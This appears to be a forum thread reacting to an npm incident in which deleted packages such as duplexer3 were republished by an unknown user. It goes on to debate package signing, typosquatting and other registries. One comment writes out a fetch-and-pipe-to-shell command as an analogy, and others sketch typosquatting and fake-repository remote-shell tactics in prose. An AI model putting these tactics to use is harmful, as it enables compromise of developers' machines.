PSA: Please be cautious because this is an excellent opportunity for taking over packages and injecting malware by malicious people.
Example: https://www.npmjs.com/package/duplexer3 which has 4M monthly downloads just reappeared, published by a fresh npm user. They published another two versions since then, so it's possible they've initially republished unchanged package, but now are messing with the code.
I'm not saying it's a malicious attempt, but it might be and it very much looks like. Be cautious as you might don't notice if some packages your code is dependent on were republished with a malicious code. It might take some time for NPM to sort this out and restore original packages.
I just tested, and it definitely looks like a troll / hack.
> duplexer3@1.0.1 install /Users/foo/Code/foo/node_modules/duplexer3
> echo "To every thing there is a season, and a time to every purpose under the heaven:
A time to be born, and a time to die; a time to plant, and a time to pluck up that which is planted;
A time to kill, and a time to heal; a time to break down, and a time to build up;
A time to weep, and a time to laugh; a time to mourn, and a time to dance;
A time to cast away stones, and a time to gather stones together; a time to embrace, and a time to refrain from embracing;
A time to get, and a time to lose; a time to keep, and a time to cast away;
A time to rend, and a time to sew; a time to keep silence, and a time to speak;
A time to love, and a time to hate; a time of war, and a time of peace.
A time to make use of duplexer3, and a time to be without duplexer3."
To every thing there is a season, and a time to every purpose under the heaven:
A time to be born, and a time to die; a time to plant, and a time to pluck up that which is planted;
A time to kill, and a time to heal; a time to break down, and a time to build up;
A time to weep, and a time to laugh; a time to mourn, and a time to dance;
A time to cast away stones, and a time to gather stones together; a time to embrace, and a time to refrain from embracing;
A time to get, and a time to lose; a time to keep, and a time to cast away;
A time to rend, and a time to sew; a time to keep silence, and a time to speak;
A time to love, and a time to hate; a time of war, and a time of peace.
A time to make use of duplexer3, and a time to be without duplexer3.
Not to mention, it’s a Pete Seeger song, the byrds just covered it. I may be wrong but I think Seeger wrote it for Judy Collins to sing.
Edit: ok nope, Seeger didn’t “write” it for Collins, she’s just another one to cover it. Here they are both doing it if you’re interested: https://youtu.be/fA9e-vWjWpw
Start posting large parts of, say, the New International Version, let me know how that goes for you.
IOW, unless it’s the King James, it is likely very much subject to take down notices. Though I’m guessing a malicious troll is much more likely to know The Byrds than they are Old Testament.
And all this is happening just as after the public release of a serious exploit which allows malicious code to do all sorts of nefarious things when it is somehow installed on the target machine. Hmm.
Given that there's hints, at least, that the problems were caused by some particular developer's actions, I wonder about the security model for package-managed platforms altogether now. If I were a big cybercrime ring, the first thing I'd do would be, get a bunch of thugs together and knock on the front door of a developer of a widely-used package; "help us launch [the sort of attack we're seeing here] or we'll [be very upset with you] with this wrench." Is there a valid defense for a platform whose security relies on the unanimous cooperation of a widely-scattered developer base?
With cases like the current one, or the leftpad incident in 2016, I'm surprised package registries still allow recycling old package names after a package was deleted. Really seems like deleted packages should be frozen forever - if the original author never recreates it or transfers ownership, then people would have to explicitly choose to move to some new fork with a new id.
But your point about pressuring or bribing package authors still stands as a scary issue. Similar things have already happened: for example, Kite quietly buying code-editor plugins from their original authors and then adding code some consider spyware (see https://news.ycombinator.com/item?id=14902630). I believe there were cases where a similar thing happened with some Chrome extensions too...
> With cases like the current one, or the leftpad incident in 2016, I'm surprised package registries still allow recycling old package names after a package was deleted.
CPAN requires the old author to explicitly transfer or mark it abandoned-and-available-to-new-owner.
For all the things wrong with perl5 (and I love it dearly but have spent enough time I can probably list more things wrong with it than the people who hate it ;) it's always a trifle depressing to watch other ecosystems failing to steal the things we got right.
This happens all the time. The new generation creates something cool because what our parents created isnt cool any more, only to fail exactly on the same spot as our parents. Only, it was already solved in the parents last version.
This goes for cloth design, cars, houses, kitchen wares and so on, as well as software.
Just look at the microwave oven earlier...
Modern microwave ovens have all adopted impractical and quirky new UIs, when the old concept of knobs was simple and worked fairly well in the first place.
My oldest one was just two dials, the second one, 15 years old had loads of buttons and stuff, really stupidly spread out, you had to press watt, minutes, seconds, start and start was not in a corner, not in top/bottom row or any other logical place so you had to search it every time. I glued a rubber piece to it so I could find it again without having to bend down and search.
Since then I have made sure the microwave has two dials, one for time, one for effect.
Remember the watercooker that had just an on & off switch?
Then came one with an option button for 80 or 100 degrees (176 or 212, in freedoms). Never knew I needed that, but that just changed my live and I can not do without it. Reason: 80 degrees water is hot enough for my needs and saves time.
Our latest has 3 buttons, with different possiblities, beebs like a maniac when ready (an option which is not unset-able) and can do things I never knew anyone would need (like keeping it at x degrees for y minutes).
I guess it is like evolution: you experiment, keep what works and get rid of all things unfit.
Packages / projects being frozen. AFAIR that's how SourceForge works/worked. I remember a few years back being baffled that I couldn't delete my own project.
But it makes sense, other projects might depend on it, so it's archived.
It's just npm that's broken. I've never used a package manager for any other language that had these kinds of issues. It's exacerbated by the massive over-reliance on external packages in JS too. `left-pad` really shone a light on how dependencies in JS land really are brought in without too much thought.
Although, I've never considered this in the case of an actual attack. It would make sense to actually fingerprint the entire source tree and record this too somewhere, so when you build it you know you are getting the right thing. Teapot basically defers this to git.
> Is there a valid defense for a platform whose security relies on the unanimous cooperation of a widely-scattered developer base?
The defense is staged deployment and active users. This obviously depends on the blutness of the malicious code.
If I may assume easily noticed effects of the malicious code: A dev at our place - using java with maven - would update the library, his workstation would get owned. This could have impacts, but if we notice, we'd wipe that workstation, re-image from backup and get in contact with sonatype to kill that version. This version would never touch staging, the last step before prod.
If we don't notice on the workstation, there's a good chance we or our IDS would notice trouble either on our testing servers or our staging servers, since especially staging is similar to prod and subject to load tests similar to prod load. Once we're there, it's back to bug reports with the library and contact with sonatype to handle that version.
If we can't notice the malicious code at all until due to really really smart activation mechanisms... well then we're in NSA conspiracy land again.
> If we can't notice the malicious code at all until due to really really smart activation mechanisms... well then we're in NSA conspiracy land again.
What about really dumb activation methods? I.e., a condition that only triggers malicious behavior several months after the date the package was subverted. You don’t have to be the NSA to write that.
What’s scary here is that there are simpleminded attacks that, AFAIK, we don’t know how to defend against.
Mh, I have a rather aggressive stance on these kind of incidents, no matter if they are availability or security related. You can fish for them, you can test for them, and there are entire classes of malicious code you cannot find. For everything you do, turing complete code can circumvent it. There's a lot of interesting reading material going on in the space of malware analysis regarding sandbox detection, for example.
So stop worrying. Try to catch as much as feasible before prod. Then focus on detecting, alerting and ending the actual incident. If code causes an incident, it't probably measurable and detectable. And even then you won't be able to catch everything. As long as a server has behavior observable from the internet, it could be exfiltrating data.
Tested restores with at most 59 minutes of data loss for prod clusters within 90 minutes after order. 30ish minutes of downtime. We could even inspect binlogs for a full restore afterwards on a per-request basis for our big customers.
Sounds like good hygiene, though it seems burdensome if everyone must do it or seriously risk infection. Ideally there would be at least minimal sanity checks and a formal process before a package can be claimed by someone else.
In case anyone was considering sending him $10, no, his hypothetical code would not be running on the Google login page. Google does not pull in external dependencies willy nilly like that.
On Google scale you quite certainly want to do that. Not just for security, but for legal reasons. You really don't want to end up using for example AGPL licensed stuff in wrong places and if you just blindly pull stuff with dependencies from package manager, this could easily happen.
One of the recent True Geordie podcasts features the "YouPorn Guy" who talks about finding it near impossible to get lawyers not on a retainer from Google to fight them.
Sure a legal audit is standard and usually much simpler than a full source audit for security, which has a complexity proportional to the project size.
I sincerely hope all modern package managers, when invoked with sudo, immediately spawn a very-low-privilege process that does most of the work sandboxed to /tmp/whatnot, and the root process just copies files to the right place and runs some system calls to update databases etc.
Most package managers I know support Turing complete install hooks. How would a package manager detect what parts of those require/are safe to run with root?
No, that's the entire point. They need almost nothing at all but the ability to run code fast in a loop with memory calls. The entire point is that they bypass privilege checks.
I'm not sure if it would help much. That means you either have to have users be able to recognize and eyeball-validate hashes ("sure, this is left-pad-5ffc991e; that's what I want! Wait, shit, it's actually left-pad-5ffd991e, never mind; wrong package), or you need pre-existing databases of trusted hashes (which either puts you right back at a registry a la NPM, or leaves you reliant on a package.lock file or similar, which doesn't cover many common use cases for secure package signing).
Detailed description what you could do with a malicious npm package is currently on he front page: "Harvesting credit card numbers and passwords from websites"
Hey, I wrote that article :) - yes it was pure coincidence, I just decided with all the security stuff going on this week (Spectre/Meltdown, I hadn't heard about the npm stuff) I'd write and article about it.
I am very surprised that a package manager of this calibre and impact abstains from best practices when it comes to authentication through code-signing. Other package managers are miles ahead of NPM. For example, Nix, which uses immutability and hashing to always produce the same artifact, regardless of changes of the sources.
So I know rpms and debs are signed, as I've setup repos for both. Docker repositories require a valid SSL key (or you have to manually allow untrusted repos). But do Python packages and Ruby gems have signature verification? How does pypy/pip and gem deal with validating a package is what it claims to be?
You have a point, but we need to take into account that the technology has been around for a long time, the risks are well known and documented, and safety concerns of most of these package managers have been addressed to maintainers.
The example in the article has come to light accidentally, but we must seriously ask ourselves how many incidents are currently unidentified.
Besides, you can use Nix for 'normal' development. It is suitable for more things than just a distro package manager.
Signing won't help unless the end user specifies the signature or certificate that they expect (signing would only help ensure package upgrades are from the same author).
If you're going to have clients specify a signature anyway, then you don't need to sign packages, you just need strong one way hash function, like SHA-1024 or something. User executes "pkg-mgr install [package name] ae36f862..."
Either way, every tutorial using npm will become invalid.
"npm install packagename" could record the public key in package.json (or package-lock.json) on first save, and only accept installs (or upgrades) matching the same public key. Just like how android app code signing works, or similar to ssh known_hosts trust-on-first-use.
Granted it wouldn't save those adding a new package to a project the first time, but it would save the bacon of anyone re-running "npm install" in an existing project, for example during a deploy, or when trying to upgrade to a newer version of a given package.
independent site that maps packages to author certs that npm uses for verification at install time?
also, this is a problem that every package mgmt system faces. they alert on changes on upgrade but there's a requirement at the end user level to verify that at install time, the cert being trusted is the right one.
I'm surprised there wasn't a global lock-down on new package registrations (or at least with the known names of lost packages) while they were working to restore them.
How does RubyGems handle a package being removed and replaced by a different (and maybe malicious) actor? Not allow a package to be deleted? Block the package name from being claimed by someone else?
> Once you've yanked all versions of a gem, anyone can push onto that same gem namespace and effectively take it over. This way, we kind of automate the process of taking over old gem namespaces.
Shit. That's a good point, I downloaded the Heroku CALI during the attack and it uses duplexer3. I got a weird message that seemed "off" during postinstall.
Were any of the deleted packages temporarily hijacked? It seems strongly like this was the case. If so, please confirm immediately so people who installed packages during this time can start scanning for malware.
Even if the answer is “yes, 1+ packages were hijacked by not-the-original author, but we’re still investigating if there was malware”, tell people immediately. Don’t wait a few days for your investigation and post mortem if it’s possible that some users’ systems have already been compromised.
I would also hope for and expect this to be communicated ASAP from the NPM org to its users.
@seldo, I understand that you don't want to disseminate misleading info, but an abundance of caution seems warranted in this case as my understanding of the incident lines up with what @yashap has said. If we're wrong, straighten us out --- if we're not, please sound an advisory, because this is major.
Yeah, these were some core, widely used packages that were deleted. If they were temporarily hijacked, lots of dev machines (including mine) may have been compromised. There’s a major security risk here, if there was any hijacking now is not the timing for information hiding and PR.
Seems like you should have froze publishing instead of saying, "Please do not attempt to republish packages, as this will hinder our progress in restoring them." Especially, to prevent, even temporary, hijacking.
"How would package signing prevent people from requesting the wrong package? The malware author could also sign their package."
And here is a perfect example. Someone replaced a legit package with a malicious one. Had the original author signed the package, then then NPM users could have defended against the new malicious author, because the new author's signing key would not be in their truststore.
Unsigned packages leave NPM package users defenseless. I hope that is crystal clear now.
When I was doing pentesting, we had an interesting assignment. Our job was to pop a dev project. Then we'd tell them how to secure themselves.
One of our tactics was to set up fake Github profiles with very similar names, then try to get someone internal to the team to `git clone` and run our code. Boom, remote shell.
We didn't execute the plan. But it was thrown around as an idea.
When a package on npm can disappear, and a new package can appear in its place at a later version, by a different author, and there is no connection between those two people, then you're in a bad situation. Just because no one currently runs attacks like this doesn't mean you'll be safe forever. It's worth getting ahead of this.
I don't know whether package signing is the best solution. Maybe yes, maybe no. But the question is, if a package vanishes, what is the proper action to take?
The solution seems like a rollback. Let us have the latest previous version from the same author, by default. That will fix the builds and not require any heavyweight changes.
But package signing would definitely be nice, if it can be integrated in a lightweight and chaos-free fashion.
Yup. Publishing to Clojars requires GPG and is a bit of a pain compared to publishing to NPM. I'd take Clojar's approach any day of the week to this nonsense, though.
Actually I'm doing him a favor ... I completely understand that people talk like that within companies. When emotions are involved, that's what happens. When you're acting in any capacity as a spokesperson for a company (or I guess a government or non-profit too), a bit more decorum is called for. It's not just him - I've been feeling this for a long time. One thing I appreciated about Obama was that he was always dignified (not that I always agreed with what he was saying). Now that the POTUS posts uncouth tweets, maybe it's okay to put statements like that in your SEC filings too.
I got down-voted for calling out some of Kalanick's frat-boy behavior and speech. I'm sure it's not popular on a site predominated by twenty-somethings but since I'm old, I'd prefer to be called old-fashioned or out-of-touch rather than simply being dismissed. If it helps ... I'm sorry that I was so blunt - I should have typed these couple of paragraphs instead.
Speaking how he spoke is exactly what the situation called for, and shaming him like this might give people the impression that the community doesn't support it. People feel differently, but for me, it was a breath of fresh air. Finally, someone talking straight with a community! "We fucked up. Report incoming." Done, A+. We can all relate.
Maybe that's not professional enough for certain circles, but hopefully this mindset will permeate to them eventually. We could all stand to loosen up a bit.
Any update on the post-mortem? How long have the binaries been replaced? Is there evidence that malware was injected into the binaries?
Additionally, you should brush up on your code signing implementations. Had you signed it with a trusted code signing cert, consumers could have verified that you produced the binaries...and not a malicious user. Assuming they didnt have access to the private key material of your code signing key.
There's a difference between people who come across or read Reddit, and those who actually post and participate on Reddit. The Average Joe is usually part of the former.
NPM is extremely vulnerable to typosquatting. Be cautious with what you install. The install scripts can execute arbitrary code. NPM's team response is that they hope that malicious actor won't exploit this behaviour. According to my tests, typosquatting 3 popular packages allows to take over around 200 computers in 2 weeks time it takes their moderators to notice it.
That's okay, but it's not enough - it's easy to swap two letters and do similar substitutions to fool many users. If a package is downloaded 10,000 times every day, surely once in a while someone will misspell the name somehow.
Other than that, their reaction to similar incidents was to wait for somebdoy on twitter to notify them, ban the responsible users, and hope that it won't happen again. It's still extremely exploitable and there are surely many other novel ways of installing malware using the repository that we haven't even heard of yet. The NPM security team is slow to act and sadly doesn't think ahead. They're responsible for one of the largest software ecosystems in the world, they should step up their game.
They could(should?) implement edit distance checks on all new packages against existing packages. If the name is too similar to an existing package name it requires approval.
Javascript is a very handy language, it's held back by all the gymnastics it needs to do to get over browser/www limitations, and an influx of low skill developers with no diploma.
> it's held back by all the gymnastics it needs to do to get over browser/www limitations,
I suppose, but I think it's the javascript "nature" ( dynamic typing along with the scripting style of wanting to be a "swiss knife" to solve all problems ). Javascript, like perl and even C, gives you a lot of rope to hang yourself. And like perl and C, javascript initially seems simple and easy and it deceives you into thinking novices know what they are doing.
> and an influx of low skill developers with no diploma.
That's true of all languages though. Plenty of incompetent developers at all levels and all languages. I don't think it's a javascript issue.
> Plenty of incompetent developers at all levels and all languages. I don't think it's a javascript issue.
While that's potentially true, I do suspect that there's a lot fewer, say, Haskell, Clojure, or Elixir developers than there are for some other languages. Not that they don't exist, but it seems unlikely that you'd cross paths with them.
There's orders of magnitudes less developers and jobs available for those languages. I'm only not an elixir developer because there's almost zero elixir jobs.
Well, both versions are true, the latter mostly following from the former. With a lower absolute number of developers, the number of incompetent programmers is going to be lower in absolute terms, despite the ratio staying the same as in other languages.
But I believe there's a difference in the ratio, too, due to the way Haskell, Erlang, Lisp, etc. programmers learn these languages. Basically, they learn the languages not because someone wants them to (eg. Java, C#, etc.) and not because they have to just to be able to do something they want to do (eg. JavaScript, SQL, etc.). Instead, people learn such languages because they themselves want to, which makes them more probable to delve deeper, learn more and acquire more important skills.
Well, that's a conjecture I can't prove and I may be completely wrong on this, it's just what my anecdotal experience suggests.
Another part of it is that someone who's incompetent in, e.g. JavaScript, is likely to not make it very far trying to do Clojure. And, again some conjecture, I'd bet that someone who is great at Clojure would write very nice JS.
When I was learning Python back in, 2006 or so, I remember someone stating "You can write Java in any language". This was referring to people who wrote Python code with these huge class hierarchies that inherited from stuff all over the place, when a "Pythonic" solution would have just involved a couple of functions.
Hey, I’ve got no diploma, just 30 years of commercial development. But even I know that all the unit tests in the world can’t paper over the flaws of a typeless scripting language.
Yikes, what is it about node/npm/javascript that makes it feel like a house of cards?
I think the (short) answer is "node, npm, and javascript".
The longer answer has something to do with the automatic installation of dependencies, and the common use of shell scripts downloaded directly off the internet and executed using the developer's or sysadmin's user account.
I used to use CPAN all the time. CPAN would check dependencies for you, but if you didn't have them already you'd get a warning and you'd have to install them yourself. It forced you to be aware of what you're installing, and it applied some pressure on CPAN authors to not go too crazy with dependencies (since they were just as annoyed by the installation process as everyone else.)
These days I use NuGet a lot. It does the dependency installation for you, but it asks for permission first. The dialogs could be better about letting you learn about the dependencies before saying they're ok. (In general, NuGet's dialogs could be a lot better about package details.)
> CPAN... forced you to be aware of what you're installing
I think CPAN is pretty sweet for variety/wide reach of packages available, but this is flat-out wrong.
CPAN is not a package manager; it is a file sprayer/script runner with a goal of dependency installation. That's perfectly sufficient for a lot of use cases, but to me "package manager" means "program that manages packages of software on my system", not the equivalent of "curl cpan.org/whatever | sh".
CPAN packages can (and do by very common convention) spray files all over the place on the target system. Then, those files are usually not tracked in a central place, so packages can't be uninstalled, packages that clobber other packages' files can't be detected, and "where did this file come from?"-type questions cannot be answered.
Whether CPAN or NPM "force you to be aware of what you're installing" seems like the least significant difference between the tools. When NPM tells you "I installed package 'foo'", it almost always means that the only changes it made to your system were in the "node_modules/foo" folder, global or not. When CPAN tells you "I installed package 'foo'" it means "I ran an install script that might have done anything that someone named 'foo'; hope that script gave you some verbose output and told you everything it was doing! Good luck removing/undoing its changes if you decide you don't want that package!"
There are ways around all of those issues with CPAN, and plenty of tools in Perl distribution utilities to address them, but they are far from universally taken advantage of. CPAN is extremely unlike, and often inferior to, NPM. Imagine if NPM packages did all of their installation logic inside a post-install hook; that's more like a CPAN distribution.
I had very limited contact with CPAN some years ago but I imagine it was slightly more sane in terms of granularity of dependencies.
Whereas a lot of npm modules are relatively small - some tiny - and have their own dependencies. So a simple "npm install blah" command can result in dozens of packages being installed. Dealing with that manually would, in fairness, be a giant chore.
Now of course there's a discussion to be had about whether thousands of weeny little modules is a good idea or not but, to be honest, that's a religious debate I'd rather steer clear of.
CPAN has a setting that force-feeds you dependencies without asking, but I don't think it's on by default. Also, CPAN runs tests by default, which usually takes forever, so users get immediate feedback when packages go dependency-crazy. The modern Perl ecosystem is often stupidly dependency-heavy, but nothing like Node.
I have recently taken over an Angular project (with a C# backend, thankfully) at my job. It took two hours to get it to even compile correctly because some dependencies were apparently outdated in package.json and it just ran on the other dev's machine by accident. I don't understand why I need over 100 dependencies for a simple Angular Single Page App that pulls JSON from the backend and pushes JSON back. Meanwhile, the C# backend (a huge, complicated behemoth of software) ran on the first click.
Three developers on my team spent the last 4 years pushing for angular. Four years ago, I was 50/50 on it vs react, so whatever, but if my team's really for it, let's do it.
Fast forward to angular 2, and we're down to two developers who are still for it.
Fast forward to today, I'm down to one angular dev who's still for it, and two of the original three have left for react jobs. Meanwhile, I'm left with a bunch of angular 1 code that needs to be upgraded to angular 2, and a few testing-out-angular-2 projects that are dependency hell.
The only reason I ultimately embraced angular 1 to begin with (above reasons aside), was because it was so opinionated about everything, I could throw it at my weaker developers and say: "just learn the angular way to do it", and there was very little left they could meaningfully screw up. Angular proponents on the team would see it as a point of expertise to teach the "angular way" to more junior devs, and everyone left the day feeling good.
When it comes to Javascript 95% difficulty with writing good maintainable code is ensuring that your team is all writing to a very exact, and consistent quality and style, since there are so many different ways you can write js, and so many potential pitfalls. And if the team all wants to embrace Google's Angular standard, that works for me. Its far easier to be able to point to an ecosystem with an explicit, opinionated way of writing code, than it is to continuously train people on how to write maintainable code otherwise.
But with angular 2, if you haven't been drinking to cool-aid for a while now, it requires so much knowledge just to get running, I can't even have junior devs work on it, without a senior dev who's also an angular fanboy there to make sure everything is set up to begin with. Its absurd. And I'm supposed to sell to the business that we need to migrate all my Angular 1 code to this monstrosity? And then spend time again every 6 months making the necessary upgrades to stay up to date? Get real.
I don't understand. We've started a new Angular 2+ project and our junior developers managed to roll into quite easily. Our designers (who know jack about Javascript) got excited when they discovered that our project uses .scss and the results have been spectacular.
Seriously, I REALLY REALLY don't get this hate for Angular 2+
Just wait until Angular 2 hasn't been cool for a while and you can't find any JS developers who are interested in maintaining your software rather than rewriting it in xyz_latest_fad_framework.
Kidding - but we had exactly the same problem, except with a React app rather than an Angular one just before Christmas.
No joke on with this statement though: every time we have a time-consuming build issue to deal with it comes down to some npm dependency problem. Honestly, if there were a way we could realistically ditch npm (NO! YARN IS NOT ANY BETTER - to preempt that suggestion - it's simply an npm-a-like) I'd happily do so but sadly there isn't.
The basic explanation is that the dependencies for the angular app are much smaller, but I’m not sure which bit is confusing you. You don’t understand why an incorrectly written program required work to run when a bigger but correctly written program was easy?
In principle programs shouldn't stop working just because they are old.
Yes, no language completely realize this. But there's a world of difference between C's "it was written only 40 years ago, why did compilers break it?" to Python's "yes, you are expected to review your code every 3 or 4 years", and there is another world of difference to the faster Javascript frameworks that practice "your code is 6 weeks too old, your looser!"
This is a cultural thing, where developers will decide when to invest in developing their library against the old version and when for the new version. For stable languages like C, or distro supported packages it’s years - just check out Debian or Red Hat for an ecosystem that values stability.
Node was a very interesting thing back when it started. It was a hack, but a nice kind of hack. You could write some efficient servers with it. But then the community that formed around it, with it the project went berserk.
Well, kind of. Node was not a general purpose tool as conceived initially. You would write some I/O bound servers in it. And PHP too is not a general purpose tool, it is for writing interactive web pages (in its pre-Web2.0 sense) easily. Though Node.js was way more intellectually designed. I don't know much about PHP, but there's lots of literature (see https://eev.ee/blog/2012/04/09/php-a-fractal-of-bad-design/).
I really wish that people would stop referencing that "Fractal of Bad Design" article. It's outdated and mostly irrelevant now (April 2012, PHP was at 5.4 then, it's at 7.2 now). It's not that I want to defend PHP, I just think people should judge PHP for what it is now instead of what it was several major changes ago.
Besides, the author seems to misunderstand a great many things about PHP and languages in general. Here's a short rebuttal (also from April 2012): https://blog.ircmaxell.com/2012/04/php-sucks-but-i-like-it.h... that explains some of the misunderstandings.
Hmm are you sure? I've read the fractal of bad design many times.
Some issues might be "fixed" but could they fix the actual *fractal of bad design"?
Isn't it still a mix of c-style, java-style, inconcistent, left associative, horribly broken language it always was?
I always thought the bugs were anecdotal backing of the main point: php is badly designed, non programming language for non programmers, who suffer stockholm syndrome from all php abuse...
> Hmm are you sure? I've read the fractal of bad design many times.
Yeah, I'm sure. And so have I. Maybe you should stop reading it to reinforce your prejudice and instead take a look at PHP 7.2?
> non programming language for non programmers, who suffer stockholm syndrome from all php abuse...
Hating PHP is almost like a bad meme. Obviously it's doing something right otherwise it probably wouldn't be as popular as it is. (Same can be said for Javascript, I guess.)
Your personal feelings about the language are pretty much irrelevant. The Fractal of Bad Design article, however, is actually spreading misinformation yet people with an axe to grind keep referencing it because it fits their agenda, hence why I react whenever I see it referenced.
Here are just a couple of examples of where it's flat out wrong and/or completely outdated. There are plenty more.
He's left in things that were fixed long before he published the article — e.g. the new array syntax — but that doesn't stop him from saying stuff like "Despite that this is the language’s only data structure, there is no shortcut syntax for it; array(...) is shortcut syntax. (PHP 5.4 is bringing “literals”, [...].)" Keep in mind, 5.4 was already out when he wrote it...
Not to mention the whole section on "missing features" where he basically enumerates things that most certainly doesn't belong in a language's core but in separate libraries or part of a framework, and —
surprise! — those are all available in both libraries, frameworks, extensions, etc.
When it's invalid, maybe. The article you link says in the first three paragraphs:
---8<---
Whether you like PHP or not, go and read the article PHP: a fractal of bad design. It's well written by someone who really knows the language which is not true for most other articles about this topic. And there are numerous facts why PHP is badly designed on many levels. There is almost no FUD so it is also a great source for someone who wants to learn PHP really well (which is kind of sad).
I am surprised that I am able to live with PHP and even like it. Maybe I am badly designed too so that I am compatible with PHP. I was able to circumvent or mitigate most problems so the language doesn't bother me.
Anyway, there are several topics which are inaccurate or I don't agree with them. Here they are with no context so they probably wouldn't make much sense without reading the original article:
Quite a few. E.g. ssh definitely was not, Rust was not, TeX was not. But these were mostly second-thought projects of the "let's now finally do everything right" kind.
The npm repository is the largest package repository in the world. A lot of the major incidents they've could have happened to other ecosystems (e.g. PyPi allows a user to delete packages that other packages depend on), but they've either not happened or haven't had as large an impact. When npm breaks, everyone notices, because everyone either uses npm or knows someone who does.
Largely because Javacsript is so broken by default that it is almost required to depend on a whole slew of dependencies for functionality other languages contain in their built-in standard libraries. And furthermore, NPM dependencies are broken down into stupidly small units, versioned rapidly, and enforces very little consistency among transitive dependencies.
Other languages and package management systems don't encourage this kind of insanity.
Well they aren't mutable/replaceable, at least not since after the left-pad incident where npm announced new rules to prevent package unpublishing. It seems this was a operational bug at npm inc.
I wonder how much damage need to be done with JS/Node until seriously is put to rest the madness. Is absolutely necessary to break backward compatibility and rebuild JS from the start. With WebAssembly this is doable (without excuses!) and we already have a nice tag to declare what script language to use.
This is not possible, you ask?
In fact, JS/CSS is the most viable of all the stacks to move forward. Let's use the "advantage" that any JS library/ecosystem die fast and put enough hipster propaganda declaring the ultimate solution.
Is too hard? JS is so bad that fix it is too easy. You only need more than the week it originally take to build it.
As a counterpoint, couldn't any sufficiently complex structure be called a hack and a house of cards, when you really dig down into how it's put together? Mm, maybe not any - as some complex systems are well-tested with solid architecture - but just some, or most..
"Have you ever noticed that anybody driving slower than you is an idiot, and anyone going faster than you is a maniac?" --George Carlin
I think the software version of this is: any system with more structure than your program is an over-engineered monstrosity, and any system with less structure than your program is a flakey hack.
A "house of cards" implies that you don't have to dig to topple it. If you have to really dig down into how it's put together in order to start pulling it apart it isn't really a house of cards.
I don't use npm or node for anything serious, and i don't really have any knowledge of how NPM works, but this isn't the first time i've read this story of a whole bunch of packages disappearing and everybody's builds breaking. If everything is a house of cards, then why don't i hear the same stories about PyPI or gems or crates?
I can't speak for PyPI, but I know Ruby gems has had vulnerabilities in the past. A quick DuckDuckGo will probably suffice to demonstrate that. I'm not saying NPM is a great system, but it does seem to me that most systems have flaws, and any system that is as heavily used as NPM is likely to have them surface faster than other systems.
As of this writing, aren't we still waiting to see what the problem was inside NPM that caused this user's packages to disappear?
It might well have been technical. It might well have been managerial. It very likely involved elements of both. But don't you think it's best to save the Monday morning quarterbacking for Monday morning, when all the facts are in?
Because it is... It's mollochian complexity heaped on top of layers of excrement and ducktape, and we have collectively entered a state of mass Stockholm Syndrome about the situation.
I really would love to ditch web dev and all its myriad tendrils, and go back to native desktop software.
Somehow i imagine a native C-Desktopdev and a Webdeveloper meeting in No-Mans Land each party escaping from its own nightmare with that line on the lips, starting with a "Dont run into this direction-"
At my job we do native C and C++, some Java, some C#, scripting in Shell, Python, and Perl. When the left-pad incident happened someone said something to the room about it, we all looked it up, and spent a good 15 minutes mind-boggled, laughing and being grateful we weren't web devs. "Wait, you're telling me these people need NPM and GitHub to deploy? Seriously?"
I'm not the poster you're replying to, but I think I understand it.
npm is not just their package management tool... the way most people use it, it depends on someone else's package registry/repository to deploy to your own servers.
And github is someone else's source code management tool/server.
As a matter of policy, if I can't have something on my own server (or one my org controls) I don't get to rely on it to deploy/run my application.
So I think I get the parent's comment... it's a really foreign situation, to me, to depend on the availability of stuff like this on servers I (or my org) don't control in order to deploy my application.
I'm sure the people who depend on these things look at me and say "Wait. You have to set up your own package repository and source control before you can deploy instead of using all this nice stuff that's available in the cloud? Seriously?"
Yeah. I've been on both sides of this coin. If I'm deploying cloud software (which I am, these days), then I have no problem relying on cloud software to make that deployment smoother. But if I ever go back to writing native applications, I sure as hell won't be reliant on the internet in order to manage intranet deployments. These are two different paradigms, and what works well in one doesn't make any sense in the other.
A public package manager and a public source code management tool, both of which are outside of your control. You should be able to deploy from a local [verified and audited] cache of your dependencies.
That's a good goal to strive for, but isn't necessary or practical for everyone. Maintaining local/hosted artifact caches, verifying them, and auditing them is a big hassle, and unless you make something (e.g. fintech, healthtech) that might need such an audit or emergency release, might not be worth the trouble.
Itty bitty company making a social website on a shoestring budget/runway with very few developers? Might just be worth postponing a release a day or two if NPM or GitHub are having issues.
How does vrtualenv make maintaining, auditing, and using a local mirror of dependencies trivial? Seems to me I can download a poisoned package into a venv cache just as easily as I can download it with wget, and unless I take the time to check, I’m none the wiser either way.
I was referring specifically to not being able to deploy due to a package manager being down. Of course there are still issues that can crop up with using virtualenv.
I haven’t dug too much, but I believe at my work, we run a server that hosts all our jars, and is the source of truth for all our builds. Nothing that’s been checked in goes straight to the Internet (you can add new dependencies to uncommitted code). And we’re only ~30 devs.
And you should also be aware of what it takes to rebuild your stack, and have something in place if that disappears. If you think it's OK to rely on external tools like that to build your system, you deserve all the fallout you get when it fails.
Eh, i like desktop development and i make desktop apps for 20+ years. Before i got Windows 95 i was even trying to make my own DE for DOS in Turbo Pascal and before that in GW-BASIC :-P. I love the desktop.
Web stuff on the other hand can die in a fiery death, as far as i am concerned together with mobile stuff they are the source of everything wrong with the desktop today :-P.
Yarn (which is an alternative to npm) uses a global cache [1] on your machine which speeds things up, but probably also protects you from immediate problems in cases like the one currently on progress (because you would probably have a local copy of e.g. require-from-string available).
Already counting down the days before yarn is considered old and broken and people are recommending switching to the next hot package manager/bundler...
yarn is one of those things coming out of the JS world that is actually really well made. yarn, typescript, react; say what you want about js fatigue, these are rock-solid, well-tested projects that are really good at what they do.
A major reason for the high toolchurn in that ecosystem is how many of those tools are not designed from the ground up, don't quite solve the things they ought to, or solve them in really weird ways (due to the low barrier of entry partly). But that doesn't mean all of it deserves that label.
Can't say anything about react, but yes: yarn and typescript are good.
This is coming from a long time Java programmer who still likes Java and Maven but now might have a new favourite language.
This is made even more impressive by the fact that it is built on the mess that is js. (Again: I'm impressed that it was made in three weeks I just wish a better language had been standardized.)
It badfles me that technologists commonly complain about new technology. As far as I can tell your complaint boils down to “people should stop making and switching to new things”.. I find it hard to understand why someone with this attitude would be a technologist of any kind, and I find the attitude really obnoxious.
I take it that you've never had to work at a big organization? When you have multiple teams in different offices, it's incredibly difficult to constantly "herd cats" and point everyone to $latest_fad. And when you DO by some miracle get everyone (devs and management) to switch to $latest_fad, it's a huge pain to go back through and bug test/change every process to accommodate the new software.
I don't think "people should stop making and switching to new things" is a fair distillation of the parent comment, as it seemed like they were just expressing frustration at the blistering pace the Javascript community is setting.
Independent teams providing business capabilities through APIs would mostly eliminate the need to keep consistent technologies as long as the interface design follows shared guidelines.
